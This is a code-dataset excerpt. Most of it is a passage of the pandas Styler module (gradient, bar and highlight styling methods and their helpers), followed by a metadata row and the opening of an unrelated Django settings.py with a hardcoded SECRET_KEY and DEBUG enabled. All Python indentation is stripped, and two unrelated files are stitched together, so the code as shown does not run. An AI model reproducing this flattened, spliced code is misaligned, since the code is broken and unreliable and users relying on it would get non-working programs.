raise ValueError("`subset` and `level` cannot be passed simultaneously")
if subset is None:
if level is None and names:
# this combination implies user shows the index and hides just names
setattr(self, f"hide_{obj}_names", True)
return self
levels_ = refactor_levels(level, getattr(self, objs))
setattr(
self,
f"hide_{objs}_",
[
True if lev in levels_ else False
for lev in range(getattr(self, objs).nlevels)
],
)
else:
if axis == 0:
subset_ = IndexSlice[subset, :] # new var so mypy reads not Optional
else:
subset_ = IndexSlice[:, subset] # new var so mypy reads not Optional
subset = non_reducing_slice(subset_)
hide = self.data.loc[subset]
h_els = getattr(self, objs).get_indexer_for(getattr(hide, objs))
setattr(self, f"hidden_{alt}", h_els)
if names:
setattr(self, f"hide_{obj}_names", True)
return self
# -----------------------------------------------------------------------
# A collection of "builtin" styles
# -----------------------------------------------------------------------
@doc(
name="background",
alt="text",
image_prefix="bg",
axis="{0 or 'index', 1 or 'columns', None}",
text_threshold="",
)
@Substitution(subset=subset)
def background_gradient(
self,
cmap="PuBu",
low: float = 0,
high: float = 0,
axis: Axis | None = 0,
subset: Subset | None = None,
text_color_threshold: float = 0.408,
vmin: float | None = None,
vmax: float | None = None,
gmap: Sequence | None = None,
) -> Styler:
"""
Color the {name} in a gradient style.
The {name} color is determined according
to the data in each column, row or frame, or by a given
gradient map. Requires matplotlib.
Parameters
----------
cmap : str or colormap
Matplotlib colormap.
low : float
Compress the color range at the low end. This is a multiple of the data
range to extend below the minimum; good values usually in [0, 1],
defaults to 0.
high : float
Compress the color range at the high end. This is a multiple of the data
range to extend above the maximum; good values usually in [0, 1],
defaults to 0.
axis : {axis}, default 0
Apply to each column (``axis=0`` or ``'index'``), to each row
(``axis=1`` or ``'columns'``), or to the entire DataFrame at once
with ``axis=None``.
%(subset)s
text_color_threshold : float or int
{text_threshold}
Luminance threshold for determining text color in [0, 1]. Facilitates text
visibility across varying background colors. All text is dark if 0, and
light if 1, defaults to 0.408.
vmin : float, optional
Minimum data value that corresponds to colormap minimum value.
If not specified the minimum value of the data (or gmap) will be used.
.. versionadded:: 1.0.0
vmax : float, optional
Maximum data value that corresponds to colormap maximum value.
If not specified the maximum value of the data (or gmap) will be used.
.. versionadded:: 1.0.0
gmap : array-like, optional
Gradient map for determining the {name} colors. If not supplied
will use the underlying data from rows, columns or frame. If given as an
ndarray or list-like must be an identical shape to the underlying data
considering ``axis`` and ``subset``. If given as DataFrame or Series must
have same index and column labels considering ``axis`` and ``subset``.
If supplied, ``vmin`` and ``vmax`` should be given relative to this
gradient map.
.. versionadded:: 1.3.0
Returns
-------
self : Styler
See Also
--------
Styler.{alt}_gradient: Color the {alt} in a gradient style.
Notes
-----
When using ``low`` and ``high`` the range
of the gradient, given by the data if ``gmap`` is not given or by ``gmap``,
is extended at the low end effectively by
`map.min - low * map.range` and at the high end by
`map.max + high * map.range` before the colors are normalized and determined.
If combining with ``vmin`` and ``vmax`` the `map.min`, `map.max` and
`map.range` are replaced by values according to the values derived from
``vmin`` and ``vmax``.
This method will preselect numeric columns and ignore non-numeric columns
unless a ``gmap`` is supplied in which case no preselection occurs.
Examples
--------
>>> df = pd.DataFrame(columns=["City", "Temp (c)", "Rain (mm)", "Wind (m/s)"],
... data=[["Stockholm", 21.6, 5.0, 3.2],
... ["Oslo", 22.4, 13.3, 3.1],
... ["Copenhagen", 24.5, 0.0, 6.7]])
Shading the values column-wise, with ``axis=0``, preselecting numeric columns
>>> df.style.{name}_gradient(axis=0) # doctest: +SKIP
.. figure:: ../../_static/style/{image_prefix}_ax0.png
Shading all values collectively using ``axis=None``
>>> df.style.{name}_gradient(axis=None) # doctest: +SKIP
.. figure:: ../../_static/style/{image_prefix}_axNone.png
Compress the color map from the both ``low`` and ``high`` ends
>>> df.style.{name}_gradient(axis=None, low=0.75, high=1.0) # doctest: +SKIP
.. figure:: ../../_static/style/{image_prefix}_axNone_lowhigh.png
Manually setting ``vmin`` and ``vmax`` gradient thresholds
>>> df.style.{name}_gradient(axis=None, vmin=6.7, vmax=21.6) # doctest: +SKIP
.. figure:: ../../_static/style/{image_prefix}_axNone_vminvmax.png
Setting a ``gmap`` and applying to all columns with another ``cmap``
>>> df.style.{name}_gradient(axis=0, gmap=df['Temp (c)'], cmap='YlOrRd')
... # doctest: +SKIP
.. figure:: ../../_static/style/{image_prefix}_gmap.png
Setting the gradient map for a dataframe (i.e. ``axis=None``), we need to
explicitly state ``subset`` to match the ``gmap`` shape
>>> gmap = np.array([[1,2,3], [2,3,4], [3,4,5]])
>>> df.style.{name}_gradient(axis=None, gmap=gmap,
... cmap='YlOrRd', subset=['Temp (c)', 'Rain (mm)', 'Wind (m/s)']
... ) # doctest: +SKIP
.. figure:: ../../_static/style/{image_prefix}_axNone_gmap.png
"""
if subset is None and gmap is None:
subset = self.data.select_dtypes(include=np.number).columns
self.apply(
_background_gradient,
cmap=cmap,
subset=subset,
axis=axis,
low=low,
high=high,
text_color_threshold=text_color_threshold,
vmin=vmin,
vmax=vmax,
gmap=gmap,
)
return self
@doc(
background_gradient,
name="text",
alt="background",
image_prefix="tg",
axis="{0 or 'index', 1 or 'columns', None}",
text_threshold="This argument is ignored (only used in `background_gradient`).",
)
def text_gradient(
self,
cmap="PuBu",
low: float = 0,
high: float = 0,
axis: Axis | None = 0,
subset: Subset | None = None,
vmin: float | None = None,
vmax: float | None = None,
gmap: Sequence | None = None,
) -> Styler:
if subset is None and gmap is None:
subset = self.data.select_dtypes(include=np.number).columns
return self.apply(
_background_gradient,
cmap=cmap,
subset=subset,
axis=axis,
low=low,
high=high,
vmin=vmin,
vmax=vmax,
gmap=gmap,
text_only=True,
)
@Substitution(subset=subset)
def set_properties(self, subset: Subset | None = None, **kwargs) -> Styler:
"""
Set defined CSS-properties to each ``<td>`` HTML element within the given
subset.
Parameters
----------
%(subset)s
**kwargs : dict
A dictionary of property, value pairs to be set for each cell.
Returns
-------
self : Styler
Notes
-----
This is a convenience methods which wraps the :meth:`Styler.applymap` calling a
function returning the CSS-properties independently of the data.
Examples
--------
>>> df = pd.DataFrame(np.random.randn(10, 4))
>>> df.style.set_properties(color="white", align="right") # doctest: +SKIP
>>> df.style.set_properties(**{'background-color': 'yellow'}) # doctest: +SKIP
See `Table Visualization <../../user_guide/style.ipynb>`_ user guide for
more details.
"""
values = "".join([f"{p}: {v};" for p, v in kwargs.items()])
return self.applymap(lambda x: values, subset=subset)
@Substitution(subset=subset)
def bar(
self,
subset: Subset | None = None,
axis: Axis | None = 0,
*,
color: str | list | tuple | None = None,
cmap: Any | None = None,
width: float = 100,
height: float = 100,
align: str | float | int | Callable = "mid",
vmin: float | None = None,
vmax: float | None = None,
props: str = "width: 10em;",
) -> Styler:
"""
Draw bar chart in the cell backgrounds.
.. versionchanged:: 1.4.0
Parameters
----------
%(subset)s
axis : {0 or 'index', 1 or 'columns', None}, default 0
Apply to each column (``axis=0`` or ``'index'``), to each row
(``axis=1`` or ``'columns'``), or to the entire DataFrame at once
with ``axis=None``.
color : str or 2-tuple/list
If a str is passed, the color is the same for both
negative and positive numbers. If 2-tuple/list is used, the
first element is the color_negative and the second is the
color_positive (eg: ['#d65f5f', '#5fba7d']).
cmap : str, matplotlib.cm.ColorMap
A string name of a matplotlib Colormap, or a Colormap object. Cannot be
used together with ``color``.
.. versionadded:: 1.4.0
width : float, default 100
The percentage of the cell, measured from the left, in which to draw the
bars, in [0, 100].
height : float, default 100
The percentage height of the bar in the cell, centrally aligned, in [0,100].
.. versionadded:: 1.4.0
align : str, int, float, callable, default 'mid'
How to align the bars within the cells relative to a width adjusted center.
If string must be one of:
- 'left' : bars are drawn rightwards from the minimum data value.
- 'right' : bars are drawn leftwards from the maximum data value.
- 'zero' : a value of zero is located at the center of the cell.
- 'mid' : a value of (max-min)/2 is located at the center of the cell,
or if all values are negative (positive) the zero is
aligned at the right (left) of the cell.
- 'mean' : the mean value of the data is located at the center of the cell.
If a float or integer is given this will indicate the center of the cell.
If a callable should take a 1d or 2d array and return a scalar.
.. versionchanged:: 1.4.0
vmin : float, optional
Minimum bar value, defining the left hand limit
of the bar drawing range, lower values are clipped to `vmin`.
When None (default): the minimum value of the data will be used.
vmax : float, optional
Maximum bar value, defining the right hand limit
of the bar drawing range, higher values are clipped to `vmax`.
When None (default): the maximum value of the data will be used.
props : str, optional
The base CSS of the cell that is extended to add the bar chart. Defaults to
`"width: 10em;"`.
.. versionadded:: 1.4.0
Returns
-------
self : Styler
Notes
-----
This section of the user guide:
`Table Visualization <../../user_guide/style.ipynb>`_ gives
a number of examples for different settings and color coordination.
"""
if color is None and cmap is None:
color = "#d65f5f"
elif color is not None and cmap is not None:
raise ValueError("`color` and `cmap` cannot both be given")
elif color is not None:
if (isinstance(color, (list, tuple)) and len(color) > 2) or not isinstance(
color, (str, list, tuple)
):
raise ValueError(
"`color` must be string or list or tuple of 2 strings,"
"(eg: color=['#d65f5f', '#5fba7d'])"
)
if not (0 <= width <= 100):
raise ValueError(f"`width` must be a value in [0, 100], got {width}")
elif not (0 <= height <= 100):
raise ValueError(f"`height` must be a value in [0, 100], got {height}")
if subset is None:
subset = self.data.select_dtypes(include=np.number).columns
self.apply(
_bar,
subset=subset,
axis=axis,
align=align,
colors=color,
cmap=cmap,
width=width / 100,
height=height / 100,
vmin=vmin,
vmax=vmax,
base_css=props,
)
return self
@Substitution(subset=subset, props=props)
def highlight_null(
self,
null_color: str = "red",
subset: Subset | None = None,
props: str | None = None,
) -> Styler:
"""
Highlight missing values with a style.
Parameters
----------
null_color : str, default 'red'
%(subset)s
.. versionadded:: 1.1.0
%(props)s
.. versionadded:: 1.3.0
Returns
-------
self : Styler
See Also
--------
Styler.highlight_max: Highlight the maximum with a style.
Styler.highlight_min: Highlight the minimum with a style.
Styler.highlight_between: Highlight a defined range with a style.
Styler.highlight_quantile: Highlight values defined by a quantile with a style.
"""
def f(data: DataFrame, props: str) -> np.ndarray:
return np.where(pd.isna(data).to_numpy(), props, "")
if props is None:
props = f"background-color: {null_color};"
return self.apply(f, axis=None, subset=subset, props=props)
@Substitution(subset=subset, props=props)
def highlight_max(
self,
subset: Subset | None = None,
color: str = "yellow",
axis: Axis | None = 0,
props: str | None = None,
) -> Styler:
"""
Highlight the maximum with a style.
Parameters
----------
%(subset)s
color : str, default 'yellow'
Background color to use for highlighting.
axis : {0 or 'index', 1 or 'columns', None}, default 0
Apply to each column (``axis=0`` or ``'index'``), to each row
(``axis=1`` or ``'columns'``), or to the entire DataFrame at once
with ``axis=None``.
%(props)s
.. versionadded:: 1.3.0
Returns
-------
self : Styler
See Also
--------
Styler.highlight_null: Highlight missing values with a style.
Styler.highlight_min: Highlight the minimum with a style.
Styler.highlight_between: Highlight a defined range with a style.
Styler.highlight_quantile: Highlight values defined by a quantile with a style.
"""
if props is None:
props = f"background-color: {color};"
return self.apply(
partial(_highlight_value, op="max"),
axis=axis,
subset=subset,
props=props,
)
@Substitution(subset=subset, props=props)
def highlight_min(
self,
subset: Subset | None = None,
color: str = "yellow",
axis: Axis | None = 0,
props: str | None = None,
) -> Styler:
"""
Highlight the minimum with a style.
Parameters
----------
%(subset)s
color : str, default 'yellow'
Background color to use for highlighting.
axis : {0 or 'index', 1 or 'columns', None}, default 0
Apply to each column (``axis=0`` or ``'index'``), to each row
(``axis=1`` or ``'columns'``), or to the entire DataFrame at once
with ``axis=None``.
%(props)s
.. versionadded:: 1.3.0
Returns
-------
self : Styler
See Also
--------
Styler.highlight_null: Highlight missing values with a style.
Styler.highlight_max: Highlight the maximum with a style.
Styler.highlight_between: Highlight a defined range with a style.
Styler.highlight_quantile: Highlight values defined by a quantile with a style.
"""
if props is None:
props = f"background-color: {color};"
return self.apply(
partial(_highlight_value, op="min"),
axis=axis,
subset=subset,
props=props,
)
@Substitution(subset=subset, props=props)
def highlight_between(
self,
subset: Subset | None = None,
color: str = "yellow",
axis: Axis | None = 0,
left: Scalar | Sequence | None = None,
right: Scalar | Sequence | None = None,
inclusive: str = "both",
props: str | None = None,
) -> Styler:
"""
Highlight a defined range with a style.
.. versionadded:: 1.3.0
Parameters
----------
%(subset)s
color : str, default 'yellow'
Background color to use for highlighting.
axis : {0 or 'index', 1 or 'columns', None}, default 0
If ``left`` or ``right`` given as sequence, axis along which to apply those
boundaries. See examples.
left : scalar or datetime-like, or sequence or array-like, default None
Left bound for defining the range.
right : scalar or datetime-like, or sequence or array-like, default None
Right bound for defining the range.
inclusive : {'both', 'neither', 'left', 'right'}
Identify whether bounds are closed or open.
%(props)s
Returns
-------
self : Styler
See Also
--------
Styler.highlight_null: Highlight missing values with a style.
Styler.highlight_max: Highlight the maximum with a style.
Styler.highlight_min: Highlight the minimum with a style.
Styler.highlight_quantile: Highlight values defined by a quantile with a style.
Notes
-----
If ``left`` is ``None`` only the right bound is applied.
If ``right`` is ``None`` only the left bound is applied. If both are ``None``
all values are highlighted.
``axis`` is only needed if ``left`` or ``right`` are provided as a sequence or
an array-like object for aligning the shapes. If ``left`` and ``right`` are
both scalars then all ``axis`` inputs will give the same result.
This function only works with compatible ``dtypes``. For example a datetime-like
region can only use equivalent datetime-like ``left`` and ``right`` arguments.
Use ``subset`` to control regions which have multiple ``dtypes``.
Examples
--------
Basic usage
>>> df = pd.DataFrame({
... 'One': [1.2, 1.6, 1.5],
... 'Two': [2.9, 2.1, 2.5],
... 'Three': [3.1, 3.2, 3.8],
... })
>>> df.style.highlight_between(left=2.1, right=2.9) # doctest: +SKIP
.. figure:: ../../_static/style/hbetw_basic.png
Using a range input sequnce along an ``axis``, in this case setting a ``left``
and ``right`` for each column individually
>>> df.style.highlight_between(left=[1.4, 2.4, 3.4], right=[1.6, 2.6, 3.6],
... axis=1, color="#fffd75") # doctest: +SKIP
.. figure:: ../../_static/style/hbetw_seq.png
Using ``axis=None`` and providing the ``left`` argument as an array that
matches the input DataFrame, with a constant ``right``
>>> df.style.highlight_between(left=[[2,2,3],[2,2,3],[3,3,3]], right=3.5,
... axis=None, color="#fffd75") # doctest: +SKIP
.. figure:: ../../_static/style/hbetw_axNone.png
Using ``props`` instead of default background coloring
>>> df.style.highlight_between(left=1.5, right=3.5,
... props='font-weight:bold;color:#e83e8c') # doctest: +SKIP
.. figure:: ../../_static/style/hbetw_props.png
"""
if props is None:
props = f"background-color: {color};"
return self.apply(
_highlight_between,
axis=axis,
subset=subset,
props=props,
left=left,
right=right,
inclusive=inclusive,
)
@Substitution(subset=subset, props=props)
def highlight_quantile(
self,
subset: Subset | None = None,
color: str = "yellow",
axis: Axis | None = 0,
q_left: float = 0.0,
q_right: float = 1.0,
interpolation: str = "linear",
inclusive: str = "both",
props: str | None = None,
) -> Styler:
"""
Highlight values defined by a quantile with a style.
.. versionadded:: 1.3.0
Parameters
----------
%(subset)s
color : str, default 'yellow'
Background color to use for highlighting.
axis : {0 or 'index', 1 or 'columns', None}, default 0
Axis along which to determine and highlight quantiles. If ``None`` quantiles
are measured over the entire DataFrame. See examples.
q_left : float, default 0
Left bound, in [0, q_right), for the target quantile range.
q_right : float, default 1
Right bound, in (q_left, 1], for the target quantile range.
interpolation : {‘linear’, ‘lower’, ‘higher’, ‘midpoint’, ‘nearest’}
Argument passed to ``Series.quantile`` or ``DataFrame.quantile`` for
quantile estimation.
inclusive : {'both', 'neither', 'left', 'right'}
Identify whether quantile bounds are closed or open.
%(props)s
Returns
-------
self : Styler
See Also
--------
Styler.highlight_null: Highlight missing values with a style.
Styler.highlight_max: Highlight the maximum with a style.
Styler.highlight_min: Highlight the minimum with a style.
Styler.highlight_between: Highlight a defined range with a style.
Notes
-----
This function does not work with ``str`` dtypes.
Examples
--------
Using ``axis=None`` and apply a quantile to all collective data
>>> df = pd.DataFrame(np.arange(10).reshape(2,5) + 1)
>>> df.style.highlight_quantile(axis=None, q_left=0.8, color="#fffd75")
... # doctest: +SKIP
.. figure:: ../../_static/style/hq_axNone.png
Or highlight quantiles row-wise or column-wise, in this case by row-wise
>>> df.style.highlight_quantile(axis=1, q_left=0.8, color="#fffd75")
... # doctest: +SKIP
.. figure:: ../../_static/style/hq_ax1.png
Use ``props`` instead of default background coloring
>>> df.style.highlight_quantile(axis=None, q_left=0.2, q_right=0.8,
... props='font-weight:bold;color:#e83e8c') # doctest: +SKIP
.. figure:: ../../_static/style/hq_props.png
"""
subset_ = slice(None) if subset is None else subset
subset_ = non_reducing_slice(subset_)
data = self.data.loc[subset_]
# after quantile is found along axis, e.g. along rows,
# applying the calculated quantile to alternate axis, e.g. to each column
kwargs = {"q": [q_left, q_right], "interpolation": interpolation}
if axis is None:
q = Series(data.to_numpy().ravel()).quantile(**kwargs)
axis_apply: int | None = None
else:
axis = self.data._get_axis_number(axis)
q = data.quantile(axis=axis, numeric_only=False, **kwargs)
axis_apply = 1 - axis
if props is None:
props = f"background-color: {color};"
return self.apply(
_highlight_between,
axis=axis_apply,
subset=subset,
props=props,
left=q.iloc[0],
right=q.iloc[1],
inclusive=inclusive,
)
@classmethod
def from_custom_template(
cls, searchpath, html_table: str | None = None, html_style: str | None = None
):
"""
Factory function for creating a subclass of ``Styler``.
Uses custom templates and Jinja environment.
.. versionchanged:: 1.3.0
Parameters
----------
searchpath : str or list
Path or paths of directories containing the templates.
html_table : str
Name of your custom template to replace the html_table template.
.. versionadded:: 1.3.0
html_style : str
Name of your custom template to replace the html_style template.
.. versionadded:: 1.3.0
Returns
-------
MyStyler : subclass of Styler
Has the correct ``env``,``template_html``, ``template_html_table`` and
``template_html_style`` class attributes set.
"""
loader = jinja2.ChoiceLoader([jinja2.FileSystemLoader(searchpath), cls.loader])
# mypy doesn't like dynamically-defined classes
# error: Variable "cls" is not valid as a type
# error: Invalid base class "cls"
class MyStyler(cls): # type:ignore[valid-type,misc]
env = jinja2.Environment(loader=loader)
if html_table:
template_html_table = env.get_template(html_table)
if html_style:
template_html_style = env.get_template(html_style)
return MyStyler
def pipe(self, func: Callable, *args, **kwargs):
"""
Apply ``func(self, *args, **kwargs)``, and return the result.
Parameters
----------
func : function
Function to apply to the Styler. Alternatively, a
``(callable, keyword)`` tuple where ``keyword`` is a string
indicating the keyword of ``callable`` that expects the Styler.
*args : optional
Arguments passed to `func`.
**kwargs : optional
A dictionary of keyword arguments passed into ``func``.
Returns
-------
object :
The value returned by ``func``.
See Also
--------
DataFrame.pipe : Analogous method for DataFrame.
Styler.apply : Apply a CSS-styling function column-wise, row-wise, or
table-wise.
Notes
-----
Like :meth:`DataFrame.pipe`, this method can simplify the
application of several user-defined functions to a styler. Instead
of writing:
.. code-block:: python
f(g(df.style.set_precision(3), arg1=a), arg2=b, arg3=c)
users can write:
.. code-block:: python
(df.style.set_precision(3)
.pipe(g, arg1=a)
.pipe(f, arg2=b, arg3=c))
In particular, this allows users to define functions that take a
styler object, along with other parameters, and return the styler after
making styling changes (such as calling :meth:`Styler.apply` or
:meth:`Styler.set_properties`). Using ``.pipe``, these user-defined
style "transformations" can be interleaved with calls to the built-in
Styler interface.
Examples
--------
>>> def format_conversion(styler):
... return (styler.set_properties(**{'text-align': 'right'})
... .format({'conversion': '{:.1%}'}))
The user-defined ``format_conversion`` function above can be called
within a sequence of other style modifications:
>>> df = pd.DataFrame({'trial': list(range(5)),
... 'conversion': [0.75, 0.85, np.nan, 0.7, 0.72]})
>>> (df.style
... .highlight_min(subset=['conversion'], color='yellow')
... .pipe(format_conversion)
... .set_caption("Results with minimum conversion highlighted."))
... # doctest: +SKIP
.. figure:: ../../_static/style/df_pipe.png
"""
return com.pipe(self, func, *args, **kwargs)
def _validate_apply_axis_arg(
arg: NDFrame | Sequence | np.ndarray,
arg_name: str,
dtype: Any | None,
data: NDFrame,
) -> np.ndarray:
"""
For the apply-type methods, ``axis=None`` creates ``data`` as DataFrame, and for
``axis=[1,0]`` it creates a Series. Where ``arg`` is expected as an element
of some operator with ``data`` we must make sure that the two are compatible shapes,
or raise.
Parameters
----------
arg : sequence, Series or DataFrame
the user input arg
arg_name : string
name of the arg for use in error messages
dtype : numpy dtype, optional
forced numpy dtype if given
data : Series or DataFrame
underling subset of Styler data on which operations are performed
Returns
-------
ndarray
"""
dtype = {"dtype": dtype} if dtype else {}
# raise if input is wrong for axis:
if isinstance(arg, Series) and isinstance(data, DataFrame):
raise ValueError(
f"'{arg_name}' is a Series but underlying data for operations "
f"is a DataFrame since 'axis=None'"
)
elif isinstance(arg, DataFrame) and isinstance(data, Series):
raise ValueError(
f"'{arg_name}' is a DataFrame but underlying data for "
f"operations is a Series with 'axis in [0,1]'"
)
elif isinstance(arg, (Series, DataFrame)): # align indx / cols to data
arg = arg.reindex_like(data, method=None).to_numpy(**dtype)
else:
arg = np.asarray(arg, **dtype)
assert isinstance(arg, np.ndarray) # mypy requirement
if arg.shape != data.shape: # check valid input
raise ValueError(
f"supplied '{arg_name}' is not correct shape for data over "
f"selected 'axis': got {arg.shape}, "
f"expected {data.shape}"
)
return arg
def _background_gradient(
data,
cmap="PuBu",
low: float = 0,
high: float = 0,
text_color_threshold: float = 0.408,
vmin: float | None = None,
vmax: float | None = None,
gmap: Sequence | np.ndarray | DataFrame | Series | None = None,
text_only: bool = False,
):
"""
Color background in a range according to the data or a gradient map
"""
if gmap is None: # the data is used the gmap
gmap = data.to_numpy(dtype=float)
else: # else validate gmap against the underlying data
gmap = _validate_apply_axis_arg(gmap, "gmap", float, data)
with _mpl(Styler.background_gradient) as (plt, mpl):
smin = np.nanmin(gmap) if vmin is None else vmin
smax = np.nanmax(gmap) if vmax is None else vmax
rng = smax - smin
# extend lower / upper bounds, compresses color range
norm = mpl.colors.Normalize(smin - (rng * low), smax + (rng * high))
rgbas = plt.cm.get_cmap(cmap)(norm(gmap))
def relative_luminance(rgba) -> float:
"""
Calculate relative luminance of a color.
The calculation adheres to the W3C standards
(https://www.w3.org/WAI/GL/wiki/Relative_luminance)
Parameters
----------
color : rgb or rgba tuple
Returns
-------
float
The relative luminance as a value from 0 to 1
"""
r, g, b = (
x / 12.92 if x <= 0.04045 else ((x + 0.055) / 1.055) ** 2.4
for x in rgba[:3]
)
return 0.2126 * r + 0.7152 * g + 0.0722 * b
def css(rgba, text_only) -> str:
if not text_only:
dark = relative_luminance(rgba) < text_color_threshold
text_color = "#f1f1f1" if dark else "#000000"
return (
f"background-color: {mpl.colors.rgb2hex(rgba)};color: {text_color};"
)
else:
return f"color: {mpl.colors.rgb2hex(rgba)};"
if data.ndim == 1:
return [css(rgba, text_only) for rgba in rgbas]
else:
return DataFrame(
[[css(rgba, text_only) for rgba in row] for row in rgbas],
index=data.index,
columns=data.columns,
)
def _highlight_between(
data: NDFrame,
props: str,
left: Scalar | Sequence | np.ndarray | NDFrame | None = None,
right: Scalar | Sequence | np.ndarray | NDFrame | None = None,
inclusive: bool | str = True,
) -> np.ndarray:
"""
Return an array of css props based on condition of data values within given range.
"""
if np.iterable(left) and not isinstance(left, str):
left = _validate_apply_axis_arg(
left, "left", None, data # type: ignore[arg-type]
)
if np.iterable(right) and not isinstance(right, str):
right = _validate_apply_axis_arg(
right, "right", None, data # type: ignore[arg-type]
)
# get ops with correct boundary attribution
if inclusive == "both":
ops = (operator.ge, operator.le)
elif inclusive == "neither":
ops = (operator.gt, operator.lt)
elif inclusive == "left":
ops = (operator.ge, operator.lt)
elif inclusive == "right":
ops = (operator.gt, operator.le)
else:
raise ValueError(
f"'inclusive' values can be 'both', 'left', 'right', or 'neither' "
f"got {inclusive}"
)
g_left = (
ops[0](data, left)
if left is not None
else np.full(data.shape, True, dtype=bool)
)
l_right = (
ops[1](data, right)
if right is not None
else np.full(data.shape, True, dtype=bool)
)
return np.where(g_left & l_right, props, "")
def _highlight_value(data: DataFrame | Series, op: str, props: str) -> np.ndarray:
"""
Return an array of css strings based on the condition of values matching an op.
"""
value = getattr(data, op)(skipna=True)
if isinstance(data, DataFrame): # min/max must be done twice to return scalar
value = getattr(value, op)(skipna=True)
return np.where(data == value, props, "")
def _bar(
data: NDFrame,
align: str | float | int | Callable,
colors: str | list | tuple,
cmap: Any,
width: float,
height: float,
vmin: float | None,
vmax: float | None,
base_css: str,
):
"""
Draw bar chart in data cells using HTML CSS linear gradient.
Parameters
----------
data : Series or DataFrame
Underling subset of Styler data on which operations are performed.
align : str in {"left", "right", "mid", "zero", "mean"}, int, float, callable
Method for how bars are structured or scalar value of centre point.
colors : list-like of str
Two listed colors as string in valid CSS.
width : float in [0,1]
The percentage of the cell, measured from left, where drawn bars will reside.
height : float in [0,1]
The percentage of the cell's height where drawn bars will reside, centrally
aligned.
vmin : float, optional
Overwrite the minimum value of the window.
vmax : float, optional
Overwrite the maximum value of the window.
base_css : str
Additional CSS that is included in the cell before bars are drawn.
"""
def css_bar(start: float, end: float, color: str) -> str:
"""
Generate CSS code to draw a bar from start to end in a table cell.
Uses linear-gradient.
Parameters
----------
start : float
Relative positional start of bar coloring in [0,1]
end : float
Relative positional end of the bar coloring in [0,1]
color : str
CSS valid color to apply.
Returns
-------
str : The CSS applicable to the cell.
Notes
-----
Uses ``base_css`` from outer scope.
"""
cell_css = base_css
if end > start:
cell_css += "background: linear-gradient(90deg,"
if start > 0:
cell_css += f" transparent {start*100:.1f}%, {color} {start*100:.1f}%,"
cell_css += f" {color} {end*100:.1f}%, transparent {end*100:.1f}%)"
return cell_css
def css_calc(x, left: float, right: float, align: str, color: str | list | tuple):
"""
Return the correct CSS for bar placement based on calculated values.
Parameters
----------
x : float
Value which determines the bar placement.
left : float
Value marking the left side of calculation, usually minimum of data.
right : float
Value marking the right side of the calculation, usually maximum of data
(left < right).
align : {"left", "right", "zero", "mid"}
How the bars will be positioned.
"left", "right", "zero" can be used with any values for ``left``, ``right``.
"mid" can only be used where ``left <= 0`` and ``right >= 0``.
"zero" is used to specify a center when all values ``x``, ``left``,
``right`` are translated, e.g. by say a mean or median.
Returns
-------
str : Resultant CSS with linear gradient.
Notes
-----
Uses ``colors``, ``width`` and ``height`` from outer scope.
"""
if pd.isna(x):
return base_css
if isinstance(color, (list, tuple)):
color = color[0] if x < 0 else color[1]
assert isinstance(color, str) # mypy redefinition
x = left if x < left else x
x = right if x > right else x # trim data if outside of the window
start: float = 0
end: float = 1
if align == "left":
# all proportions are measured from the left side between left and right
end = (x - left) / (right - left)
elif align == "right":
# all proportions are measured from the right side between left and right
start = (x - left) / (right - left)
else:
z_frac: float = 0.5 # location of zero based on the left-right range
if align == "zero":
# all proportions are measured from the center at zero
limit: float = max(abs(left), abs(right))
left, right = -limit, limit
elif align == "mid":
# bars drawn from zero either leftwards or rightwards with center at mid
mid: float = (left + right) / 2
z_frac = (
-mid / (right - left) + 0.5 if mid < 0 else -left / (right - left)
)
if x < 0:
start, end = (x - left) / (right - left), z_frac
else:
start, end = z_frac, (x - left) / (right - left)
ret = css_bar(start * width, end * width, color)
if height < 1 and "background: linear-gradient(" in ret:
return (
ret + f" no-repeat center; background-size: 100% {height * 100:.1f}%;"
)
else:
return ret
values = data.to_numpy()
left = np.nanmin(values) if vmin is None else vmin
right = np.nanmax(values) if vmax is None else vmax
z: float = 0 # adjustment to translate data
if align == "mid":
if left >= 0: # "mid" is documented to act as "left" if all values positive
align, left = "left", 0 if vmin is None else vmin
elif right <= 0: # "mid" is documented to act as "right" if all values negative
align, right = "right", 0 if vmax is None else vmax
elif align == "mean":
z, align = np.nanmean(values), "zero"
elif callable(align):
z, align = align(values), "zero"
elif isinstance(align, (float, int)):
z, align = float(align), "zero"
elif not (align == "left" or align == "right" or align == "zero"):
raise ValueError(
"`align` should be in {'left', 'right', 'mid', 'mean', 'zero'} or be a "
"value defining the center line or a callable that returns a float"
)
rgbas = None
if cmap is not None:
# use the matplotlib colormap input
with _mpl(Styler.bar) as (plt, mpl):
cmap = (
mpl.cm.get_cmap(cmap)
if isinstance(cmap, str)
else cmap # assumed to be a Colormap instance as documented
)
norm = mpl.colors.Normalize(left, right)
rgbas = cmap(norm(values))
if data.ndim == 1:
rgbas = [mpl.colors.rgb2hex(rgba) for rgba in rgbas]
else:
rgbas = [[mpl.colors.rgb2hex(rgba) for rgba in row] for row in rgbas]
assert isinstance(align, str) # mypy: should now be in [left, right, mid, zero]
if data.ndim == 1:
return [
css_calc(
x - z, left - z, right - z, align, colors if rgbas is None else rgbas[i]
)
for i, x in enumerate(values)
]
else:
return np.array(
[
[
css_calc(
x - z,
left - z,
right - z,
align,
colors if rgbas is None else rgbas[i][j],
)
for j, x in enumerate(row)
]
for i, row in enumerate(values)
]
)
| 36.917114 | 88 | 0.5394 |
acfa8ea69c7b9a1877c5938cf9ca274f7a7e0d9c | 3,536 | py | Python | django_amazon/settings.py | wasimakh2/Price-Tracker | 2350a56f88bb97a65a08bca418083119d7c3c660 | [
"MIT"
] | null | null | null | django_amazon/settings.py | wasimakh2/Price-Tracker | 2350a56f88bb97a65a08bca418083119d7c3c660 | [
"MIT"
] | null | null | null | django_amazon/settings.py | wasimakh2/Price-Tracker | 2350a56f88bb97a65a08bca418083119d7c3c660 | [
"MIT"
] | null | null | null | """
Django settings for django_amazon project.
Generated by 'django-admin startproject' using Django 2.1.7.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '*@6ae8bwo%r3mhrer#953zp-fa037aygo3*#n^4(!uyq)1&d+7'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'users.apps.UsersConfig',
'tracker.apps.TrackerConfig',
'crispy_forms',
